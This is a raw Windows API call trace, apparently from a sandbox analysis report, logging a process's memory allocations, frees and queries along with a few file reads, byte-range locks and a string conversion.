	[0219.559] VirtualFree (lpAddress=0x2280000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.559] VirtualFree (lpAddress=0x2260000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.559] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2260000
	[0219.560] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2280000
	[0219.560] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x22a0000
	[0219.560] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x22b0000
	[0219.560] VirtualFree (lpAddress=0x22a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.561] VirtualFree (lpAddress=0x2280000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.561] VirtualAlloc (lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x4) returned 0x2280000
	[0219.561] VirtualQuery (in: lpAddress=0x2190000, lpBuffer=0x1b5d808, dwLength=0x1c | out: lpBuffer=0x1b5d808*(BaseAddress=0x2190000, AllocationBase=0x2190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.561] VirtualQuery (in: lpAddress=0x2190000, lpBuffer=0x1b5d804, dwLength=0x1c | out: lpBuffer=0x1b5d804*(BaseAddress=0x2190000, AllocationBase=0x2190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.561] VirtualAlloc (lpAddress=0x0, dwSize=0x100, flAllocationType=0x3000, flProtect=0x4) returned 0x22a0000
	[0219.562] VirtualFree (lpAddress=0x2190000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.562] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2190000
	[0219.562] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x22c0000
	[0219.562] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x22d0000
	[0219.563] VirtualFree (lpAddress=0x22c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.563] VirtualFree (lpAddress=0x2190000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.563] VirtualAlloc (lpAddress=0x0, dwSize=0x1b, flAllocationType=0x3000, flProtect=0x4) returned 0x2190000
	[0219.564] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x22c0000
	[0219.564] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x22e0000
	[0219.564] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x22f0000
	[0219.564] VirtualQuery (in: lpAddress=0x22f0000, lpBuffer=0x1b5d80c, dwLength=0x1c | out: lpBuffer=0x1b5d80c*(BaseAddress=0x22f0000, AllocationBase=0x22f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.565] VirtualFree (lpAddress=0x22f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.565] VirtualFree (lpAddress=0x22e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.565] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x22e0000
	[0219.565] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x22f0000
	[0219.566] VirtualAlloc (lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x4) returned 0x2300000
	[0219.566] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000
	[0219.566] VirtualAlloc (lpAddress=0x0, dwSize=0x25, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000
	[0219.567] VirtualAlloc (lpAddress=0x0, dwSize=0x35, flAllocationType=0x3000, flProtect=0x4) returned 0x2330000
	[0219.567] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x2340000
	[0219.567] VirtualAlloc (lpAddress=0x0, dwSize=0x7d, flAllocationType=0x3000, flProtect=0x4) returned 0x2350000
	[0219.568] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2360000
	[0219.568] VirtualFree (lpAddress=0x2330000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.568] VirtualFree (lpAddress=0x2340000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.568] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.569] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000
	[0219.569] VirtualAlloc (lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x4) returned 0x2330000
	[0219.569] VirtualAlloc (lpAddress=0x0, dwSize=0x1b, flAllocationType=0x3000, flProtect=0x4) returned 0x2340000
	[0219.570] VirtualAlloc (lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x4) returned 0x2370000
	[0219.570] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2380000
	[0219.570] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2390000
	[0219.571] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x23a0000
	[0219.571] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x23b0000
	[0219.571] VirtualQuery (in: lpAddress=0x2310000, lpBuffer=0x1b5d808, dwLength=0x1c | out: lpBuffer=0x1b5d808*(BaseAddress=0x2310000, AllocationBase=0x2310000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.571] VirtualQuery (in: lpAddress=0x2310000, lpBuffer=0x1b5d804, dwLength=0x1c | out: lpBuffer=0x1b5d804*(BaseAddress=0x2310000, AllocationBase=0x2310000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.571] VirtualAlloc (lpAddress=0x0, dwSize=0x100, flAllocationType=0x3000, flProtect=0x4) returned 0x23c0000
	[0219.572] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.572] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000
	[0219.572] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x23d0000
	[0219.573] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x23e0000
	[0219.573] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x23f0000
	[0219.573] VirtualFree (lpAddress=0x23e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.574] VirtualFree (lpAddress=0x23d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.574] VirtualAlloc (lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x4) returned 0x23d0000
	[0219.574] VirtualAlloc (lpAddress=0x0, dwSize=0x33, flAllocationType=0x3000, flProtect=0x4) returned 0x23e0000
	[0219.575] VirtualAlloc (lpAddress=0x0, dwSize=0x3, flAllocationType=0x3000, flProtect=0x4) returned 0x2400000
	[0219.575] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000
	[0219.575] VirtualFree (lpAddress=0x2400000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.576] VirtualFree (lpAddress=0x23e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.576] VirtualFree (lpAddress=0x2430000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.576] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.577] VirtualFree (lpAddress=0x2450000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.577] VirtualFree (lpAddress=0x2430000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.578] VirtualQuery (in: lpAddress=0x2470000, lpBuffer=0x1b5d80c, dwLength=0x1c | out: lpBuffer=0x1b5d80c*(BaseAddress=0x2470000, AllocationBase=0x2470000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.578] VirtualFree (lpAddress=0x2470000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.578] VirtualFree (lpAddress=0x2450000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.579] VirtualQuery (in: lpAddress=0x2500000, lpBuffer=0x1b5d80c, dwLength=0x1c | out: lpBuffer=0x1b5d80c*(BaseAddress=0x2500000, AllocationBase=0x2500000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.579] VirtualFree (lpAddress=0x2500000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.579] VirtualFree (lpAddress=0x24f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.580] VirtualQuery (in: lpAddress=0x2560000, lpBuffer=0x1b5d80c, dwLength=0x1c | out: lpBuffer=0x1b5d80c*(BaseAddress=0x2560000, AllocationBase=0x2560000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.580] VirtualFree (lpAddress=0x2560000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.580] VirtualFree (lpAddress=0x2550000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.581] VirtualQuery (in: lpAddress=0x25b0000, lpBuffer=0x1b5d804, dwLength=0x1c | out: lpBuffer=0x1b5d804*(BaseAddress=0x25b0000, AllocationBase=0x25b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.581] VirtualQuery (in: lpAddress=0x25d0000, lpBuffer=0x1b5d80c, dwLength=0x1c | out: lpBuffer=0x1b5d80c*(BaseAddress=0x25d0000, AllocationBase=0x25d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.581] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.581] VirtualFree (lpAddress=0x25c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.582] VirtualQuery (in: lpAddress=0x2620000, lpBuffer=0x1b5d80c, dwLength=0x1c | out: lpBuffer=0x1b5d80c*(BaseAddress=0x2620000, AllocationBase=0x2620000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.582] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.583] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.583] ReadFile (in: hFile=0x114, lpBuffer=0x1748a00, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x1b5dee8, lpOverlapped=0x1b5deac | out: lpBuffer=0x1748a00*, lpNumberOfBytesRead=0x1b5dee8*=0x800, lpOverlapped=0x1b5deac) returned 1
	[0219.583] VirtualFree (lpAddress=0x26b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.584] VirtualFree (lpAddress=0x26a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.584] VirtualFree (lpAddress=0x26d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.585] VirtualFree (lpAddress=0x26b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.585] VirtualQuery (in: lpAddress=0x2640000, lpBuffer=0x1b5d808, dwLength=0x1c | out: lpBuffer=0x1b5d808*(BaseAddress=0x2640000, AllocationBase=0x2640000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.585] VirtualQuery (in: lpAddress=0x2640000, lpBuffer=0x1b5d804, dwLength=0x1c | out: lpBuffer=0x1b5d804*(BaseAddress=0x2640000, AllocationBase=0x2640000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.585] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.586] VirtualFree (lpAddress=0x2700000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.587] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.587] VirtualQuery (in: lpAddress=0x2720000, lpBuffer=0x1b5d80c, dwLength=0x1c | out: lpBuffer=0x1b5d80c*(BaseAddress=0x2720000, AllocationBase=0x2720000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.588] VirtualFree (lpAddress=0x2720000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.588] VirtualFree (lpAddress=0x2700000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.589] VirtualFree (lpAddress=0x2780000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.589] VirtualFree (lpAddress=0x2770000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.590] VirtualFree (lpAddress=0x27a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.590] VirtualFree (lpAddress=0x2780000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.591] VirtualFree (lpAddress=0x27c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.591] VirtualFree (lpAddress=0x27a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.591] VirtualQuery (in: lpAddress=0x27e0000, lpBuffer=0x1b5d80c, dwLength=0x1c | out: lpBuffer=0x1b5d80c*(BaseAddress=0x27e0000, AllocationBase=0x27e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.591] VirtualFree (lpAddress=0x27e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.592] VirtualFree (lpAddress=0x27c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.593] VirtualFree (lpAddress=0x2830000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.593] VirtualFree (lpAddress=0x2820000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.593] VirtualFree (lpAddress=0x2850000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.594] VirtualFree (lpAddress=0x2830000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.594] VirtualQuery (in: lpAddress=0x2880000, lpBuffer=0x1b5d80c, dwLength=0x1c | out: lpBuffer=0x1b5d80c*(BaseAddress=0x2880000, AllocationBase=0x2880000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.594] VirtualFree (lpAddress=0x2880000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.595] VirtualFree (lpAddress=0x2870000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.596] VirtualQuery (in: lpAddress=0x28a0000, lpBuffer=0x1b5d808, dwLength=0x1c | out: lpBuffer=0x1b5d808*(BaseAddress=0x28a0000, AllocationBase=0x28a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.596] VirtualQuery (in: lpAddress=0x28a0000, lpBuffer=0x1b5d804, dwLength=0x1c | out: lpBuffer=0x1b5d804*(BaseAddress=0x28a0000, AllocationBase=0x28a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.596] VirtualFree (lpAddress=0x28a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.596] VirtualQuery (in: lpAddress=0x2990000, lpBuffer=0x1b5d80c, dwLength=0x1c | out: lpBuffer=0x1b5d80c*(BaseAddress=0x2990000, AllocationBase=0x2990000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.597] VirtualFree (lpAddress=0x2990000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.597] VirtualFree (lpAddress=0x2980000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.598] VirtualFree (lpAddress=0x29e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.598] VirtualFree (lpAddress=0x29d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.599] VirtualFree (lpAddress=0x2a00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.599] VirtualFree (lpAddress=0x29e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.600] VirtualFree (lpAddress=0x2a20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.600] VirtualFree (lpAddress=0x2a00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.600] VirtualQuery (in: lpAddress=0x2a40000, lpBuffer=0x1b5d80c, dwLength=0x1c | out: lpBuffer=0x1b5d80c*(BaseAddress=0x2a40000, AllocationBase=0x2a40000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.601] VirtualFree (lpAddress=0x2a40000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.601] VirtualFree (lpAddress=0x2a20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.602] VirtualFree (lpAddress=0x2a80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.602] VirtualFree (lpAddress=0x2a90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.602] VirtualFree (lpAddress=0x2a70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.603] VirtualQuery (in: lpAddress=0x2ac0000, lpBuffer=0x1b5d80c, dwLength=0x1c | out: lpBuffer=0x1b5d80c*(BaseAddress=0x2ac0000, AllocationBase=0x2ac0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.603] VirtualFree (lpAddress=0x2ac0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.603] VirtualFree (lpAddress=0x2a90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.604] VirtualQuery (in: lpAddress=0x2b20000, lpBuffer=0x1b5d80c, dwLength=0x1c | out: lpBuffer=0x1b5d80c*(BaseAddress=0x2b20000, AllocationBase=0x2b20000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.604] VirtualFree (lpAddress=0x2b20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.605] VirtualFree (lpAddress=0x2b10000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.606] VirtualFree (lpAddress=0x2b70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.606] VirtualFree (lpAddress=0x2b80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.606] VirtualFree (lpAddress=0x2b90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.607] VirtualQuery (in: lpAddress=0x2b90000, lpBuffer=0x1b5d80c, dwLength=0x1c | out: lpBuffer=0x1b5d80c*(BaseAddress=0x2b90000, AllocationBase=0x2b90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.607] VirtualFree (lpAddress=0x2b90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.607] VirtualFree (lpAddress=0x2b80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.608] VirtualQuery (in: lpAddress=0x2c10000, lpBuffer=0x1b5d7d4, dwLength=0x1c | out: lpBuffer=0x1b5d7d4*(BaseAddress=0x2c10000, AllocationBase=0x2c10000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.608] VirtualFree (lpAddress=0x2b80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.609] VirtualFree (lpAddress=0x2b90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.609] VirtualFree (lpAddress=0x2bd0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.609] VirtualFree (lpAddress=0x2bc0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.610] VirtualFree (lpAddress=0x2be0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.610] VirtualQuery (in: lpAddress=0x2b90000, lpBuffer=0x1b5d80c, dwLength=0x1c | out: lpBuffer=0x1b5d80c*(BaseAddress=0x2b90000, AllocationBase=0x2b90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.610] VirtualFree (lpAddress=0x2b90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.611] VirtualFree (lpAddress=0x2b80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.611] UnlockFileEx (in: hFile=0x114, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x1b5deb0 | out: lpOverlapped=0x1b5deb0) returned 1
	[0219.611] VirtualFree (lpAddress=0x1a90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.611] VirtualFree (lpAddress=0x1aa0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.612] VirtualFree (lpAddress=0x1ab0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.612] VirtualFree (lpAddress=0x1ac0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.612] VirtualFree (lpAddress=0x1ad0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.613] VirtualFree (lpAddress=0x1ae0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.613] VirtualFree (lpAddress=0x1760000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.614] VirtualFree (lpAddress=0x1a80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.614] VirtualFree (lpAddress=0x1750000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.614] VirtualAlloc (lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x4) returned 0x1750000
	[0219.615] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x1760000
	[0219.615] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x1a80000
	[0219.616] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x1a90000
	[0219.616] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x1aa0000
	[0219.616] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x1ab0000
	[0219.617] VirtualAlloc (lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x4) returned 0x1ac0000
	[0219.617] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x4) returned 0x1ad0000
	[0219.618] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1ae0000
	[0219.618] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x2b80000
	[0219.619] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x2b90000
	[0219.619] VirtualQuery (in: lpAddress=0x2b90000, lpBuffer=0x1b5d86c, dwLength=0x1c | out: lpBuffer=0x1b5d86c*(BaseAddress=0x2b90000, AllocationBase=0x2b90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.619] VirtualFree (lpAddress=0x2b90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.619] VirtualFree (lpAddress=0x2b80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.620] VirtualAlloc (lpAddress=0x0, dwSize=0x3c0, flAllocationType=0x3000, flProtect=0x4) returned 0x2b80000
	[0219.620] VirtualFree (lpAddress=0x2b80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.621] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2b80000
	[0219.621] VirtualAlloc (lpAddress=0x0, dwSize=0x3, flAllocationType=0x3000, flProtect=0x4) returned 0x2b90000
	[0219.622] VirtualAlloc (lpAddress=0x0, dwSize=0x3, flAllocationType=0x3000, flProtect=0x4) returned 0x2bc0000
	[0219.622] VirtualFree (lpAddress=0x2bc0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.622] VirtualAlloc (lpAddress=0x0, dwSize=0x78, flAllocationType=0x3000, flProtect=0x4) returned 0x2bc0000
	[0219.623] VirtualAlloc (lpAddress=0x0, dwSize=0x32, flAllocationType=0x3000, flProtect=0x4) returned 0x2bd0000
	[0219.623] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2be0000
	[0219.624] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2c20000
	[0219.624] VirtualFree (lpAddress=0x2c20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.624] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0x2c20000
	[0219.625] VirtualAlloc (lpAddress=0x0, dwSize=0x23, flAllocationType=0x3000, flProtect=0x4) returned 0x2c30000
	[0219.625] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2c40000
	[0219.626] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2c50000
	[0219.626] VirtualFree (lpAddress=0x2c50000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.627] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x2c50000
	[0219.627] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2c60000
	[0219.627] VirtualQuery (in: lpAddress=0x2c60000, lpBuffer=0x1b5e1e4, dwLength=0x1c | out: lpBuffer=0x1b5e1e4*(BaseAddress=0x2c60000, AllocationBase=0x2c60000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.627] VirtualFree (lpAddress=0x2be0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.628] VirtualFree (lpAddress=0x2bc0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.628] VirtualFree (lpAddress=0x2c40000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.628] VirtualFree (lpAddress=0x2c20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.629] VirtualAlloc (lpAddress=0x0, dwSize=0x960, flAllocationType=0x3000, flProtect=0x4) returned 0x2bc0000
	[0219.629] VirtualQuery (in: lpAddress=0x2bc0000, lpBuffer=0x1b5e4ac, dwLength=0x1c | out: lpBuffer=0x1b5e4ac*(BaseAddress=0x2bc0000, AllocationBase=0x2bc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.629] LockFileEx (in: hFile=0x114, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x1b5eb50 | out: lpOverlapped=0x1b5eb50) returned 1
	[0219.629] LockFileEx (in: hFile=0x114, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x1b5eb3c | out: lpOverlapped=0x1b5eb3c) returned 1
	[0219.629] UnlockFileEx (in: hFile=0x114, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x1b5eb54 | out: lpOverlapped=0x1b5eb54) returned 1
	[0219.629] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e0242, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89
	[0219.629] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x3000, flProtect=0x4) returned 0x2be0000
